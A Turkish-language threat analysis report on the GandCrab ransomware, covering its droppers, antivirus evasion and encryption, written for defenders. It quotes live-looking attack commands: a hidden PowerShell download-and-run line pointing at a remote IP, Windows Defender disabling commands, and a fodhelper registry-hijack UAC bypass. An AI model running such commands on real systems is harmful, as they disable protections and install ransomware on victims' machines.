Zararlı Yazılım - STM · 2019-04-17 · Gandcrab fidye yazılımının Tor ağı üzerinde...

TASNİF DIŞI Zararlı Yazılım

Analiz Raporu

[ SİBER FÜZYON MERKEZİ ] Tarih : 15 Nisan 2019 Rapor No : ZF2019-06-0002

© STM Savunma Teknolojileri Mühendislik ve Ticaret A.Ş. 2019. Her Hakkı Mahfuzdur. Bu doküman veya herhangi bir kısmı STM’nin yazılı izni olmadan çoğaltılamaz, yayınlanamaz ve değiştirilemez. Bu dokümanın dağıtımı veya sunumu ile STM’nin hakları ortadan kalkmış olmaz. Bu doküman

ve içeriği hazırlanma amacının dışında kullanılamaz. TASNİF DIŞI

GANDCRAB FİDYECİLİK ZARARLI YAZILIMI

Son zamanlarda Dünya genelinde yayılım oranı artan ve uzun zamandır farklı saldırı

kampanyaları ile varlığını devam ettiren GandCrab fidyecilik zararlı yazılımı, STM Siber Füzyon Merkezi tarafından takip altına alınarak detaylı bir şekilde incelenmiştir. Kullandıkları yöntemler ile zararlı yazılımların hangi ülkelerde çalışmaması gerektiği ile ilgili teknik detaylar grubun Rusya menşeili bir saldırı grubu olduğu kanısını güçlendirmektedir.

Grubun benzer saldırılar yürüttüğü Pinchy Spider, Lalartu isimli saldırgan gruplarının da içerik

dili Rusça olan “Lolzteam” forumda aktif olmaları bu grupların Gandcrab saldırısı ile ilişkili olabilecekleri ihtimalini arttırmaktadır. Pinchy Spider isimli grup ile ilgili ilk tespitler 2018 yılında yapılmıştır. Grup bütün saldırılarında GandCrab zararlı yazılımının farklı versiyonlarını kullanmıştır.

Finansal Motivasyon unsuruna sahip olan GandCrab zararlı yazılımı Lolzteam dışında Exploit.in

forumunda da aktif olarak faaliyet göstermektedir. Gandcrab[at]***.** ve gandcrabraas[at]****.*** e-posta adresleri üzerinden gerçek bir muhattap ile iletişim kurmanın şu an için mümkün olduğu görülmektedir.

Gandcrab fidye yazılımının Tor ağı üzerinde “Ransomware as a Service” olarak satıldığı STM

İstihbarat Merkezi tarafından tespit edilmiştir. Bu servisin yer aldığı forumdaki ilan metni aşağıdaki görselde yer almaktadır.

1) Yayılma Mekanizması GandCrab, çeşitli yayılma mekanizmalarını kullanmaktadır. Bu mekanizmalar spam mailler ve

exploit kitler aracılığıyla gerçekleştirilmektedir. GandCrab zararlısına ait ilk versiyonların RIG ve

GrandSoft exploit kitleri ile spam mailler aracılığıyla dağıtılmak için kullanıldığı görülmüştür.

İlgili spam mailler içerisinde ek olarak yerleştirilmiş ZIP uzantılı dosyaların yer aldığı görülmüş ve zip

içerisinde yer alan javascript dosyasının çalıştırılarak GandCrab zararlısına ait payload dosyasının

indirilerek sisteme enfekte olduğu tespit edilmiştir.


Analiz Raporu




Görsel 1 Ek olarak gönderilen zararlı yazılım

Aşağıdaki görselde GandCrab’in ilk versiyonlarına ait örneklerin javascript dosyaları aracılığıyla

sisteme indirildiği görülmektedir.

Görsel 2 Javascript aracılığıyla indirilen dosya


Analiz Raporu




1.1 ) Javascript Dropper

E-Posta eki olarak gelen zip dosyasının içinde yer alan javascript dosyaları, GandCrab orijinal

dosyasını sisteme enfekte etmek için farklı metotlar kullanmaktadır.

Görsel 3 Karmaşıklaştırılmış javascript kod dosyası.

Görsel 3’de yer alan obfuscate edilmiş javascript kod dosyası çalıştırılıp kendini deobfuscate

ettikten sonra powershell komutu çalıştırılmakta ve ardından Gandcrab payload dosyasını

indirmektedir.

İlgili komut aşağıda yer almaktadır :

powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile(‘hXXp://92.63.197.38/letsgo.exe?LbPUer’,’C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe’); staRt-ProceSS ‘C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe’

İlerleyen sürümlerde javascript dosyalarına uygulanan obfuscation yöntemlerinin değişiklik gösterdiği

gözlemlenmiştir.


Analiz Raporu




Görsel 4 Karmaşıklaştırılmış başka bir javascript kod dosyası.

İlgili javascript kodları deobfuscate edildiğinde zararlının uzak sunucudan indirilip çalıştırıldığı

gözlemlenmektedir.

Görsel 5 Uzak sunucudan indirilen GandCrab Payload dosyası.

Uzak sunucudan GandCrab payload dosyası direkt olarak indirilip aşağıdaki komut ile

çalıştırılmaktadır.

C:\Windows\System32\cmd.exe” /c C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe

GandCrab’e ait bir başka javascript dropper dosyası incelendiğinde, GandCrab payload

dosyasını indirmek için direkt olarak powershell ile uzak sunucudan dosya indirip çalıştırma tekniğinin

burada kullanılmadığı görülmüştür.

İncelenen javascript dropper dosyalarında Powershell, ActiveX Object, WScript, gömülü C#

kodları gibi farklı tekniklerin kullanıldığı görülmüştür.


Analiz Raporu




Görsel 6 Wscript tekniğinin kullanıldığı kod parçacığı.

Spam maillerde yer alan javascript dosyası açıldığında obfuscate edilmiş kodlar ile

karşılaşılmıştır.


Analiz Raporu




Görsel 7 Karmaşıklaştırılmış javascript kodu

Obfuscate edilmiş kodlar ve değişkenler dinamik analiz yöntemleri ile incelendiğinde ActiveX

objesi çalıştıran ve ardından WScript aracılığıyla payload dosyalarını çalıştıran kod parçaları

görülmüştür.


Analiz Raporu




Görsel 8 Activex ve Wscript ile payload çalıştıran kod parçaçığı

Görsel 9’da yer alan kod parçasının antivirüs yazılımlarını tespit edip sonlandırmak ve enfekte

edilecek sistemde hak yükseltmek için kullanıldığı tespit edilmiştir.


Analiz Raporu




Görsel 9 Antivirüs atlatma ve hak yükseltme için kullanılan kod parçacığı.

İlgili kod sırasıyla aşağıdaki işlemleri gerçekleştirmektedir :

Avast Antivirus tespiti ve sonlandırılması,

Windows Defender tespiti ve sonlandırılması,

Microsoft Network Realtime Inspection Service tespiti ve sonlandırılması,

GandCrab payload dosyasının indirilmesi ve çalıştırılması.


Analiz Raporu




Uygulanan her işlem farklı javascript dosyası olarak çalışmaktadır.

Kyoxks.js

Nykvwcajm.js

Bervcptyvulur.js

Recjyzcz.js

Aşağıdaki fonksiyon, parametre olarak aldığı komutu çalıştırmaktadır. Eğer komut başarılı bir

şekilde çalıştırılmazsa 100ms. beklenmekte ve tekrar denenmektedir. Bu kontrol en fazla 1800 kez

gerçekleşmektedir. Eğer hala başarısız olursa WScript.Shell ile zararlı kod parçacığı sonlandırılmaktadır.

Görsel 10 Antivirüs atlatma ve hak yükseltme için kullanılan kod parçacığı.

Aynı zamanda çalışan servislerin kontrolü WMI (Windows Management Instrumentation)

sorguları aracılığıyla yapılmaktadır.


Analiz Raporu




Görsel 11 Winmgmts-Windows Management Instrumentation ile servis kontrolü.

Eğer sistemde Avast Antivirus servisi çalışıyorsa kyoxks.js scripti indirilip çalıştırılmaktadır.

Görsel 12 Avast antivirüs kontrolü için “kyoxks.js” scriptinin indirilip çalıştırılması.

Antivirus yazılımlarını atlatma amaçlı geliştirilmiş payload dosyalarının yer aldığı ana kod

dosyası deobfuscate edildiğinde, javascript dosyalarının çalıştırılacağı metotlar karşımıza çıkmaktadır.

Kodlar üzerinde düzenleme yapıldığında ilgili metotlardan birine Görsel 13’de yer verilmiştir.


Analiz Raporu




Görsel 13 Kyoxks.js payload kodu

Bu aşamadan sonra dört farklı Antivirus yazılımlarını atlatma amaçlı geliştirilmiş payload

dosyalarının yer aldığı javascript kodları deobfuscate edilecektir.

Deobfuscate edilen kyoxks.js dosyasına Görsel 14’de yer verilmiştir. İlgili kod parçasında

nfdmkk değişkenine atanmış, Base64 ile encode edilmiş Unicode Powershell kod parçası

görülmektedir.

Bu kod parçası decode edilip Windows kayıt defterinde aşağıda yer alan alana yazılmaktadır ;

HKEY_CURRENT_USER\SOFTWARE\ycsdrr\pvrylqzhlnv


Analiz Raporu




Görsel 14 Kyoxks.js isimli scriptin deobfuscate edilmesi.

Zararlı kod parçası, Windows kayıt defterine yazıldıktan sonra powershell aracılığıyla

çalıştırılmaktadır.

Görsel 15 Powershell aracılığıyla kayıt defterine yazılan zararlı kod parçası.


Analiz Raporu




Powershell kodu çalıştırılmadan önce Windows versiyon kontrolü yapılmaktadır. Versiyon

kontrol aralıklarının 6 ile 10 arasında olduğu görülmektedir. Dolayısıyla saldırganlar tarafından

hedeflenen işletim sistemleri aşağıdaki gibidir :

Windows Vista Windows Server 2008 Windows Server 2008 R2 Windows 7 Windows Server 2012 Windows 8 Windows Server 2012 R2 Windows 8.1 Windows Server 2016 Windows Server 2019 Windows 10

Versiyon kontrolü yapıldıktan sonra, versiyon numarasına göre powershell kodu çalıştırılmaktadır.

Görsel 16 Versiyon numarasına göre çalıştırılan powershell kodu.

Windows kayıt defterine “HKCU:\\Software\\Classes\\exefile\\shell\\open\\command\\” alanı açılıp Base64 ile encode edilmiş zararlı kod parçası, slui.exe olarak kayıt edilip zamanlanmış görevler aracılığıyla çalıştırılmaktadır. Çalıştırma işlemi bittikten sonra “HKCU:\\Software\\Classes\\exefile\\” altındaki alanlar silinmektedir.


Analiz Raporu




Nfdmkk değişkeninde yer alan Base64 ile encode edilmiş kod, decode edildiğinde aşağıdaki

kod parçası oluşmaktadır.

Görsel 17 Encode edilmiş kodun decode edilmesi.

İlgili powershell kodu aşağıdaki işlemleri yapmaktadır :

Dosyaların geçici dizine kopyalanması,

Avast Update uygulamasının bulunması,

Ön belleğe alınmış verilerin temizlenmesi,

Add-Type kısmından sonra başlayan C# kodunun çalıştırılması

Add-Type kısmından sonra Powershell kodunun içerisine C# kodu yerleştirildiği görülmektedir.

İlgili C# kodu Avast Updater servisinin process id numarasını bulup, uygun mesajı ShowWindows

metodunu kullanarak a11, a14 veya a13 metotları aracılığıyla göndermektedir.


Analiz Raporu




Görsel 18 AddType kısmından sonra çalıştırılan C# kodu.

Gömülü olarak yerleştirilen C# kodu kullanılarak Görsel 19’da yer alan powershell kodları ile

Avast Updater işlemi atlatılmaktadır.


Analiz Raporu




Görsel 19 Avast Updater işleminin atlatılması

Bu aşamadan sonra yukarıda bahsedilen powershell ve scheduler task (zamanlanmış görevler)

komutları çalıştırılarak lqesuuz isimli zamanlanmış görevler ayarlanmaktadır.

Eğer servisler içerisinde WdNisSvc veya WinDefend varsa nykvwcajm.js scripti

çalıştırılmaktadır. İlgili script Windows Defender servisini deaktif etmek için kullanılmaktadır.

Görsel 20 Windows Defender servisinin deaktif edilmesi.

Servisleri deaktif etmek için kullanılan kodlar temelinde birbirlerine benzemektedir.

Nykvwcajm.js scriptinin decrypt edilmiş haline Görsel 21’de yer verilmiştir.


Analiz Raporu




Görsel 21 Nykvwcajm.js scriptinin decrypt edilmiş kodları

İlgili scriptin gerçekleştirdiği işlemler aşağıda listelenmiştir :

WdNisSvc veya WinDefend servislerinin çalışıp çalışmadığının kontrolü, İşletim sistemi versiyonuna göre çalıştırılacak komutların belirlenmesi, (İlgili zararlının analizi Windows 7 ve Windows 10 ortamlarında gerçekleştirilmiştir.) cmd.exe /C “powershell Set-MpPreference -DisableRealtimeMonitoring $true && taskkill /im MSASCui* /f /t . “fodhelper.exe /C “sc stop WinDefend && taskkill /im MSASCui /f /t” komutu “HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command\” kayıt defteri alanına yazılmaktadır. İlgili komutlar ile Windows Defender servisi disable duruma getirilmektedir. “HKEY_CURRENT_USER\Software\Classes\mssettings\shell\open\command\DelegateExecute” kayıt defteri alanı boş olarak ayarlanmaktadır. fodhelper.exe dosyası çalıştırılmaktadır. Çalıştırıldıktan 2 saniye sonra “HKEY_CURRENT_USER\\Software\\Classes\\ms-settings\\shell\\open\\command\\” kayıt defteri değeri silinmektedir.

Yapılan araştırmalar sonrasında ilgili zararlının Windows Defender servisini deaktif etmek için

Windows sistemlerde yer alan privilege escalation (hak yükseltme) tekniğini kullandığı ve

saldırganların direkt olarak ilgili zafiyeti istismar eden exploiti kullandıkları tespit edilmiştir.

İlgili tekniğin Fileless UAC Bypass / Registry Hijacking olarak adlandırıldığı görülmüştür.


Analiz Raporu




Eğer servisler içerisinde Microsoft Network Realtime Inspection Service(NisSrv) varsa bervcptyvulur.js scripti çalıştırılmaktadır. İlgili script Microsoft Network Realtime Inspection Service’i bypass etmek için kullanılmaktadır.

Görsel 22 Microsoft Network Realtime Inspection Service için bervcptyvulur.js çalıştıran kod

Bervcptyvulur.js scriptinin decrypt edilmiş hali aşağıdaki gibidir.

Görsel 23 Bervcptyvulur.js scriptinin decrypt edilmiş hali

İlgili kodda da “MsiExec.exe /X{2AA3C13E-0531–41B8-AE48-AE28C940A809} ACCEPT=YES /qr+ /quiet” komutu ile Microsoft Network Realtime Inspection Service bypass edilmektedir.


Analiz Raporu




Eğer servisler içerisinde AhnLab v3 Antivirus (V3 Service) varsa recjyzcz.js scripti

çalıştırılmaktadır. İlgili script AhnLab v3 Antivirus uygulamasını deaktif etmek için kullanılmaktadır.

Görsel 24 AhnLab v3 Antivirüs kontrolü yapan kod.

Recjyzcz.js scriptinin decrypt edilmiş haline Görsel-25’de yer verilmiştir.


Analiz Raporu




Görsel 25 Recjyzcz.js scriptinin decrypt edilmesi.

Kod içerisinde yer alan Powershell kodu “HKEY_CURRENT_USER\\Software\\capvzgf\\cazysa” kayıt defteri alanına yazılmakta, ardından önceki anlatılan metotlarla aynı şekilde sistemde hak yükseltme yapılmaktadır.

Script içerisinde yer alan Base64 encoded veri decode edildiğinde, içerisine C# kodları gömülü Powershell kod parçası oluşmaktadır.


Analiz Raporu




Görsel 26 Base64 ile encode edilmiş verinin decode edilmesi.

Sistemde hak yükseltme işlemi tamamlandıktan sonra aşağıdaki komutlar çalıştırılmaktadır :

C:\Windows\System32\cmd.exe /c “runas /trustlevel:0x40000 \Desktop\install.exe -Uninstall” & “%TEMP%\AhnUn000.tmp” –UC

C:\Windows\System32\cmd.exe /c “runas /trustlevel:0x40000 %TEMP%\AhnUn000.tmp” -UC

İlgili komutlar çalıştırıldıktan sonra Görsel 27’de yer alan kod parçası ile AhnLab v3 Antivirus

uygulaması sistemden kaldırılmaktadır.


Analiz Raporu




Görsel 27 AhnLab v3 Antivirus uygulaması sistemden kaldırılmaktadır.

Dropper’a ait tüm adımlar başarıyla gerçekleştikten sonra GandCrab’a ait payload dosyası

indirilmekte ve ilgili zararlı çalıştırılıp sistem enfekte hale getirilmektedir.

Payload dosyasına ait decryption aşamaları Görsel 28’de yer almaktadır.


Analiz Raporu




Görsel 28 Payload dosyasına ait decryption.

Yapılan incelemeler sonucunda Gandcrab payload dosyasının ProcessDoppelgänging isimli bir Process Hollowing tekniği ile sisteme yerleştiği tespit edilmiştir.

1.2 ) MSOffice Dropper

Javascript dosyalarına alternatif olarak GandCrab, zararlı ofis dosyaları ile de esas payload

dosyasını indirmektedir. Görsel 29’da yer alan bir mail ile “.doc” dosyasının kullanıcının açılması

sağlanmakta ve zararlı VBA kodları çalıştırılarak GandCrab’e ait payload dosyası indirilmektedir.

Görsel 29 GandCrab’e ait payload dosyasının indirilme aşaması.


Analiz Raporu




E-posta eki olarak gelen bazı ofis dosyalarının parola korumalı olarak gösterildiği görülmüştür.

Görsel 30 Oltalama yöntemi ile kurbana ulaşan bir e-posta eki.

1.3 ) Exploit Kit

Gandcrab, bir başka saldırı vektörü olarak exploit kitleri kullanmaktadır. Yapılan araştırmalar ve incelemeler sonucunda Gandcrab ekibinin Fallout, Grandsoft, RIG, Magnitude, EITest, Necurs exploit kitleri aracılığıyla saldırılar gerçekleştirdiği tespit edilmiştir.

Kullanıcıların web tarayıcılarında bulunan zafiyetleri istismar etme yöntemi, saldırganların sıklıkla kullandığı yöntemlerden biridir. Örnek olarak kullanıcı güncel olmayan bir Flash sürümü kullanıyorsa, saldırganların kullanıcıya zararlı kodlar içeren linki tıklatarak enfeksiyon işlemini tamamlaması yetmektedir.

Bunlara bağlı olarak RIG exploit kiti bünyesinde CVE-2018–4878 ve CVE-2018–8174 Flash zafiyetleri ile Gandcrab payloadlarını barındırmaktadır. Bu konu Nisan 2018 tarihinde zararlı yazılım araştırmacıları tarafından keşfedilmiştir.

Görsel 31 RIG Exploit kitinin istismar ettiği uygulamalar.

RIG Exploit Kitinin dünya genelinde gösterdiği yayılıma ait enfekte şeması aşağıdaki gibidir. Exploit Kit içerisinde yer alan ülkeler arasında Türkiye’de yer almaktadır.


Analiz Raporu




Görsel 32 RIG Exploit kitinin yayılım haritası.

Gandcrab RIG Exploit Kit’ine ait saldırı ve enfeksiyon grafiği aşağıdaki görselde yer almaktadır.

Görsel 33 RIG Exploit kiti saldırı ve enfeksiyon grafiği.


Analiz Raporu




cmd. exe ile tetiklenen zafiyet ile Gandcrab’i sisteme indirip çalıştıran javascript kodu aşağıdaki gibidir.

Görsel 34 Javascript dropper kodu.

Kodun düzenlenmiş hali aşağıdaki görselde yer almaktadır.

Görsel 35 Js Dropper düzenlenmiş kod.


Analiz Raporu




İndirilen dosya %TEMP% dizini altına b25.exe olarak konulmaktadır. Dosya ismi oluşturma algoritması incelendiğinde b[0–56].exe şeklinde dosya oluşturulduğu görülmüştür.

Son indirilen Gandcrab payload’ı aşağıdaki komut ile çalıştırılmaktadır.

C:\Windows\System32\cmd.exe” /c b25.exe

GrandSoft exploit kitine ait görsele aşağıda yer verilmiştir.

Görsel 36 Grandsoft exploit kiti.

GrandSoft exploit kitinde ise CVE-2016–0189 zafiyeti bulunan Internet Explorer sürümü saldırı kampanyası için kullanılmaktadır. İlgili zafiyet Internet Explorer içerisinde yer alan vbscript.dll kütüphanesinde bulunan memory corruption zafiyetinden kaynaklanmaktadır. İlgili zafiyet Mayıs 2016 tarihinde yamanmıştır fakat yamanmamış sistemler üzerinde vbscript kodları çalıştırılabilinmektedir.

Salgın kampanyasında kullanılan vbscript koduna aşağıda yer verilmiştir.


Analiz Raporu




Görsel 37 Vbscript kodu.

İndirilen dosya, indirildiği uzantıya göre sistemde çalıştırılmaktadır.

Görsel 38 Vbscript kodu.


Analiz Raporu




EITest exploit kitine ait görsele aşağıda yer verilmiştir.

Görsel 39 EITest isimli exploit kiti.

Necurs exploit kitine ait görsele aşağıda yer verilmiştir. Invoice isimli javascript dosyaları E-Posta eki olarak gelmektedir.

Görsel 40 Invoice isimli javascript dosyası


Analiz Raporu




2) GandCrab Payload Analizi

Zararlı, çalışmaya başladığı andan itibaren enfekte olduğu makine üzerindeki dosyaları

şifrelemektedir. Zararlı aynı zamanda enfekte makineye ait masaüstü arka planını fidye mesajı ile

değiştirmekte ve şifrelenen klasörlerin içerisinde fidye ödemesine dair detayların yer aldığı html sayfası

oluşturmaktadır.

Fidye ödemesine dair detayların yer aldığı görsele aşağıda yer verilmiştir. İlgili html dosyası şifrelenen her klasörün içerisine yerleştirilmektedir.

Görsel 42 Kurbanın cihazındaki her klasöre ilgili html dosyası yerleştirilmektedir.

Görsel 41 Gandcrab masaüstü arkaplanı


Analiz Raporu




Gandcrab örneklerine ait versiyon bilgileri uygulama içerisinde yer almaktadır.

Görsel 43 GandCrab versiyon bilgisi.

Gandcrab, kod akışına devam etmeden önce ilk olarak aşağıdaki proseslerin enfekte olduğu

sistemde çalışıp çalışmadığını kontrol etmektedir.

Görsel 44 GandCrab çalışan process kontrolü.


Analiz Raporu




Kontrol edilen prosesler içerisinde o an sistemde aktif olan varsa, çalışan prosesin çalışması sonlandırılmaktadır.

Görsel 45 GandCrab çalışan processin sonlandırılması.

Kontrol edilen proseslerin listesine aşağıdaki tabloda yer verilmiştir.

S.N. Process Adı

1 msftesql.exe

2 sqlagent.exe

3 sqlbrowser.exe

4 sqlwriter.exe

5 oracle.exe

6 ocssd.exe

7 dbsnmp.exe

8 synctime.exe

9 agntsvc.exe

10 isqlplussvc.exe

11 xfssvccon.exe

12 sqlservr.exe

13 mydesktopservice.exe

14 ocautoupds.exe

15 agntsvc.exe

16 encsvc.exe

17 firefoxconfig.exe

18 tbirdconfig.exe

19 mydesktopqos.exe

20 ocomm.exe

21 mysqld.exe

22 mysqld-nt.exe

23 mysqld-opt.exe

24 dbeng50.exe

25 sqbcoreservice.exe

26 excel.exe


Analiz Raporu




27 infopath.exe

28 msaccess.exe

29 mspub.exe

30 onenote.exe

31 outlook.exe

32 powerpnt.exe

33 steam.exe

34 sqlservr.exe

35 thebat.exe

36 thebat64.exe

37 thunderbird.exe

38 visio.exe

39 winword.exe

40 wordpad.exe

Gandcrab, enfekte olduğu makine ile ilgili keşif yaparak işlemlere başlamaktadır. Keşif aşamasında elde edilen makine bulguları aşağıda listelenmiştir.

S.N. Makine Bulgusu

1 Kullanıcı adı

2 Bilgisayar adı

3 Domain adı

4 Yerel bilgi

5 Klavye düzeni

6 İşletim sistemi bilgisi

7 Kurulu antivirüs yazılımları

8 İşlemci tipi ve adı

9 Sürücü tipleri

10 Dahili bellekteki boş alan

11 IP adres bilgisi


Analiz Raporu




Görsel 46 Enfekte makineye ait bulgular.

Görsel 47 Enfekte makineye ait bulgular.

Keşif aşamasında GandCrab klavye düzenini kontrol ederken Rusça klavye düzeni ile karşılaşırsa, zararlının kendi prosesini sonlandırdığı gözlemlenmiştir. Kontrol edilen diller aşağıdaki gibidir:


Analiz Raporu




Görsel 48 Kontrol edilen klavye düzenleri.

Sistemde kurulu olan antivirüs uygulamaları Gandcrab tarafından kontrol edilmektedir.

Görsel 49 Kontrol edilen antivirüs uygulamaları.


Analiz Raporu




İlgili kontrollerin yapıldığı fonksiyona ait kodlara aşağıdaki görselde yer verilmiştir.

Görsel 50 Ghidra Kontrol edilen antivirüs uygulamaları ekran görüntüsü


Analiz Raporu




Kontrol edilen antivirüs uygulamalarına ait listeye aşağıda yer verilmiştir.

S.N. Antivirüs Adı

1 Kaspersky Internet Security

2 Eset Nod32 Antivirus

3 Avira Antivirus

4 Avast Antivirus

5 Norton Anti Bot

6 Mcafee Antivirus

7 Panda Antivirus

8 Comodo Antivirus

9 Symantec Endpoint

10 Tiny Firewall

11 Trend Micro Internet Security

12 F-Secure Internet Security

13 Microsoft Security Essentials

Gandcrab aynı zamanda seri numarası, işlemci adı ve işlemci tanımlayıcısının birleştirilmesi ile oluşan dizinin CRC32 özet(hash) değerini hesaplayarak her enfekte makine için benzersiz bir Ransom-ID değeri üretmektedir.

Analiz sırasında enfekte olan makine için üretilmiş olan Ransom-ID değeri aşağıdaki gibidir.

Enfekte edilen sistemin tekrar enfekte edilmemesi için mutex oluşturulmakta ve varolan mutex’in kontrolü yapılmaktadır.

Mutex işlemlerinin ardından analiz sırasında aşağıdaki link dikkat çekmektedir.

Linkin içeriği incelenince aşağıda yer alan görsel ile karşılaşılmıştır. Görselde, analistlere karşı Rusça argo ifade yer almaktadır.


Analiz Raporu




Görsel 51 Görselde kullanılan dil: Rusça.

Keşif işlemlerinin bitmesinin ardından Gandcrab, elde ettiği cihaz bilgilerini RC4 algoritması ile şifreledikten sonra Base64 ile encode etmektedir.

RC4 ile şifreleme işlemi yapılmadan hemen önce RC4 algoritmasına ait secret key stack veri yapısına eklenmektedir.

Görsel 52 Payload örneğinin kullandığı gizli anahtar: Jopochlen

İlgili fonksiyona ait kaynak koda aşağıdaki görselde yer verilmiştir.

Görsel 53 Ghidra jopochlen anahtarı ekran görüntüsü


Analiz Raporu




Analiz edilen Gandcrab payload örneği “jopochlen” isimli gizli anahtarı kullanmaktadır. İlgili

gizli anahtar ile RC4 şifrelemesi yapıldıktan sonra Base64 encode işlemi yapılmaktadır.

Görsel 54 Rc4 ardından Base64 encode işleminin gerçekleştirilmesi.

Gandcrab, enfekte olduğu makinedeki dosyaları şifrelemeden önce bir takım dosya kontrolleri

yapmaktadır. İlk başta şifrelenmeyecek dizinlerin kontrolünü gerçekleştirmektedir.

Görsel 55 Şifrelenmeyecek dizinlerin kontrol edilmesi.

Şifreleme işleminin gerçekleşmeyeceği dizinler aşağıda listelenmiştir.

S.N. Dizin Adı

1 \\Program Data\\

2 \\IETldCache\\

3 \\Boot\\

4 \\Program Files\\

5 \\Tor Browser\\

6 \\All Users\\


Analiz Raporu




7 \\Local Settings\\

8 \\Windows\\

9 \\Program Files (x86)\\

10 \\Program Files\\Common\\

Dizin kontrolünün ardından şifreleme işleminin gerçekleşmeyeceği dosyaların kontrolü

yapılmaktadır.

Görsel 56 Şifreleme işleminin yapılmayacağı dosyaların kontrolü.

Şifreleme işleminin gerçekleşmeyeceği dosyalara ait listeye aşağıda yer verilmiştir.

S.N. Dosya İsmi

1 desktop.ini

2 autorun.inf

3 ntuser.dat

4 iconcache.db

5 bootsect.bak

6 boot.ini


Analiz Raporu




7 ntuser.dat.log

8 thumbs.db

9 Bootfont.bin

10 KRAB-DECRYPT.html

11 KRAB-DECRYPT.txt

12 CRAB-DECRYPT.txt

13 NTDETECT.COM

14 ntdlr

15 ntuser.dat

Şifreleme algoritmasında kullanılacak olan public key .data segmentinde şifrelenmiş bir şekilde

yer almaktadır.

Görsel 57 Şifrelenmiş public key.

İlgili public key aşağıdaki görselde yer alan algoritma ile deşifrelenmekte, decrypt edilen key değeri heap belleğe ve global değişkende saklanan bellek işaretçisine daha sonra kullanılmak üzere konulmaktadır.


Analiz Raporu




Görsel 58 Public keyi deşifre eden algoritma

Şifrelenmiş dizi elemanları önce 0x5 ile xor edilerek ardından Salsa20 stream cipher kullanılarak

deşifreleniyor. Ayrıca kod içerisinde Salsa20 algoritmasının mucidi Daniel Bernstein’a gönderme yapılmaktadır.

Görsel 59 Salsa20 algoritmasının kullanıldığına dair ipucu.

Public ve private anahtarları işlemci tarafında Microsoft Cryptographic Provider ve aşağıdaki API fonksiyonları kullanılarak oluşturulmaktadır.

S.N. API Fonksiyonu

1 ADVAPI32.CryptAcquireContextW

2 ADVAPI32.CryptGenKey

3 ADVAPI32.CryptExportKey

4 ADVAPI32.CryptDestroyKey

5 ADVAPI32.CryptReleaseContext

6 ADVAPI32.CryptImportKey

7 ADVAPI32.CryptGetKeyParam

8 ADVAPI32.CryptEncrypt


Analiz Raporu




Görsel 60 Kullanılan API fonksiyonu.

Dinamik olarak oluşturulan fonksiyonlara ait kod parçası aşağıdaki gibidir.

Görsel 61 Ghidra Dinamik oluşturulan fonksiyonlar ekran görüntüsü


Analiz Raporu




Şifreleme anahtarlarının oluşturulması ve dosyaların şifrelenmesine ait genel görsele aşağıda yer verilmiştir.

Görsel 62 Şifreleme metodolojisi.

Dosyaların şifrelenmesine ait adımlar :

1) İlk olarak Salsa20 stream cipher ile bellekte gömülü olarak yer alan RSA-2048 public key çözülmektedir.

2) Salsa20 algoritmasının başlangıç durumu, gömülü olarak yer alan RSA-2048 public key’ini decode etmektedir. Bu işlem yapılırken aşağıdaki alanlara göre yapılmaktadır.

Sabit değer: “expand 32-byte k”

Anahtar değeri: “@hashbreaker Daniel J. Bernstei”

Nonce değeri: “@hashbr.”

Konum bitleri 0'dır ve encoding/decoding sırasında artırılır. 3) RSA-2048 public/private anahtar çiftini oluşturmak için CryptGenKey metodu

kullanılmaktadır. 4) Salsa20 anahtarı olan veya olmayan bir 32 bayt ve 8 bayt değer üretmek için iki kez

CryptGenRandom çağrılmaktadır. 5) Oluşturulan RSA-2048 private anahtarı Salsa20 matrisi ile şifrelenmektedir. Bu işlem bir

önceki maddede üretilen rastgele değerler ile gerçekleştirilmektedir. 6) Ana Salsa20 anahtarı ve nonce değeri (“@hashbr.”) gömülü RSA-2048 public anahtarı ile

şifrelenmektedir. Bu işlem yapılırken CryptEncrypt metodu kullanılmaktadır. 7) RSA-2048 public key, RegSetValueEx metodu ile

HKCU\Software\keys_data\data\public” kayıt defteri alanına yazılır. Salsa20 anahtarı ve nonce değeri (“@hashbr.”), RSA-2048 public anahtarı ile şifrelenmiş hali ile “HKCU\Software\keys_data\data\private” kayıt defteri alanına yazılmaktadır.

8) Oluşturulan RSA-2048 public anahtarı ile her dosya için benzersiz olan Salsa20 anahtarlarını ve nonce değerleri şifrelenir.

9) Salsa20 anahtar akışı oluşturulurken temel yöntem XOR operatörüdür.


Analiz Raporu




Görsel 63 Dosyaların şifrelenme metodolojisi.

Şifrelenmiş dosyalara ait detaylar ise aşağıdaki gibidir:

Dosya içeriği, her dosya için benzersiz olan Salsa20 anahtar ve nonce değerleri ile şifrelidir. Salsa20 anahtarı, oluşturulan RSA-2048 public anahtar ile şifrelenmiştir. Salsa20 nonce değeri, oluşturulan RSA-2048 public anahtar ile şifrelenmiştir.

C&C mekanizması incelendiğinde 200'den fazla domain adresine bağlantı kurulduğu görülüyor. Bağlantı kurulan domain adreslerine IOC kısmında yer verilmiştir.Encrypted olarak tutulan domain adreslerinin bağlantı kurulmadan önce decrypt edilmesi işlemine ait kod parçası aşağıdaki gibidir.

Görsel 64 Ghidra domain adreslerinin decrypt edilmesi ekran görüntüsü


Analiz Raporu




URL adresine ait oluşturma düzeni http://{host}/{deger1}/{deger2}/{path}.{uzanti} şeklinde tespit edilmştir. URL oluşturma düzeninde yer alan kısımlar aşağıdaki görsellerde yer almaktadır. {deger1} kısmının üretilmesi;

Görsel 65 {deger1} kısmının üretim adımı.

{deger2} kısmının üretilmesi;

Görsel 66 {deger2} kısmının üretim adımı.


Analiz Raporu




{path} kısmının üretilmesi;

Görsel 67 {path} kısmının üretim adımı.

{uzanti} kısmının üretilmesi;

Görsel 68 {uzantı} kısmının üretim adımı.

Yukarıdaki işlemler tüm domainler için tamamlandıktan sonra örnek bir bağlantı aşağıdaki gibi olmaktadır.

Görsel 69 Tamamlanan bağlantı


Analiz Raporu




Kurulan bağlantıya ait kod parçası aşağıdaki görselde yer almaktadır.

Görsel 70 Ghidra kurulan bağlantıya ait ekran görüntüsü

Şifreleme anahtarı oluşturma adımları tamamlandıktan sonra şifrelenmiş dosyaların uzantısı

değiştirilmektedir. Aşağıdaki algoritma ile dosya uzantısı üretilmektedir.

Görsel 71 Dosya uzantısı üretim adımı

